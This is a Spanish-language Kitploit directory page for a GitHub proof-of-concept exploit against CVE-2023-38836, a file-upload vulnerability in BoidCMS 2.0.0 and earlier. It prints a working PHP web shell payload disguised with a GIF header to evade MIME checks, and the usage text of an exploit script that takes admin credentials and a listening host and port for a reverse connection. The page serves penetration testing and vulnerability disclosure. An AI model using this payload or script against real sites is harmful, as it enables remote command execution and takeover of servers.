Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38836 — Exploit PoC para vulnerabilidad de subida de archivos en BoidCMS versión <=2.0.0 | Kitploit
Herramientas/GitHubGitHub/1337kid/cve-2023-38836
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHub1337kid/cve-2023-38836

CVE-2023-38836

Exploit PoC para vulnerabilidad de subida de archivos en BoidCMS versión <=2.0.0

Ver Repositorio
51hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2023-38836

Vulnerabilidad de carga de archivos en BoidCMS v.2.0.0 permite a un atacante autenticado cargar un archivo con tipo peligroso (CWE-434).
Para explotarla, un atacante podría agregar un encabezado GIF para evadir las comprobaciones de tipo MIME.

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

Uso

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port

Descargar herramienta